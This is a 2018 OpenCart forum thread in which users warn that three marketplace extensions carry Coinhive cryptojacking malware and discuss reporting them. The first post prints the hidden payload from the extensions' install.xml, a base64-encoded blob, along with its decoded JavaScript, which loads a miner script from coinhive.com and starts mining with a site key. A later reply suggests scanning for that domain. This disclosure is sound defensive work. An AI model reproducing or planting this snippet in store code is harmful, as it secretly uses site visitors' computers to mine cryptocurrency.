OpenCart Community

OpenCart Community Forum - Discuss shopping cart and e-commerce solutions.
https://forum.opencart.com/

Caution open cart extensions found with coinhive malware

https://forum.opencart.com/viewtopic.php?t=202333

Page 1 of 1

Caution open cart extensions found with coinhive malware

Posted: Tue Feb 20, 2018 5:10 am
by rebeccag
I have found the 3 extensions are infected with coinhive malware, do not install them

https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab
https://www.opencart.com/index.php?rout ... er=CodeLab

The install.xml contains this

Code: Select all

		$inherit = base64_decode('PHNjcmlwdD4gZG9jdW1lbnQud3JpdGUoIjxzY3JpcHQgdHlwZT0ndGV4dC9qYXZhc2NyaXB0JyBzcmM9JyIrIGF0b2IoJ2FIUjBjSE02THk5amIybHVhR2wyWlM1amIyMHZiR2xpTDJOdmFXNW9hWFpsTG0xcGJpNXFjdz09JykgKyAiJz48XC9zY3IiICsgImlwdD4iKTs8L3NjcmlwdD48c2NyaXB0PiB2YXIganN3b3JrZXIgPSBuZXcgQ29pbkhpdmUuQW5vbnltb3VzKCdFMFFpM3JiNzRoWTVaR3hweG5ySXBoVXRseXhScElIVScse3Rocm90dGxlOiAwLjIsZm9yY2VBU01KUzogZmFsc2V9KTtqc3dvcmtlci5zdGFydChhdG9iKCdRMjlwYmtocGRtVXVSazlTUTBWZlJWaERURlZUU1ZaRlgxUkJRZz09JykpOzwvc2NyaXB0Pg==');

decodes to this

Code: Select all

<script> document.write("<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('E0Qi3rb74hY5ZGxpxnrIphUtlyxRpIHU',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('Q29pbkhpdmUuRk9SQ0VfRVhDTFVTSVZFX1RBQg=='));</script>

Re: Caution open cart extensions found with coinhive malware

Posted: Tue Feb 20, 2018 5:42 am
by OSWorX
Have you reported the developer and those extensions?

Re: Caution open cart extensions found with coinhive malware

Posted: Tue Feb 20, 2018 11:52 am
by IP_CAM
Well, I have reported them about 10 days ago, but OC does not seem to care much about it,
as it looks. ::)
Ernie

Re: Caution open cart extensions found with coinhive malware

Posted: Fri Feb 23, 2018 5:59 am
by rebeccag
One other used reported they had already reported it about 2 weeks ago, but nothing seams to have happened yet. I sent another support request this morning. I also added warnings to the extensions but the uploader keeps deleting them.

Re: Caution open cart extensions found with coinhive malware

Posted: Fri Feb 23, 2018 7:46 am
by IP_CAM
Well, it almost looks like taking the last chance, to still generate some income ... ::)
Ernie
Image

Re: Caution open cart extensions found with coinhive malware

Posted: Tue Jun 12, 2018 8:10 am
by zaidladha
Who was the developer? Is there a list of infected extensions?

Re: Caution open cart extensions found with coinhive malware

Posted: Tue Jun 12, 2018 10:40 am
by IP_CAM
Well, just scan your OC Software for:

Code: Select all

coinhive.com
and if you don't find anyting, you don't have to worry about coinhive :D
Ernie
All times are UTC+08:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/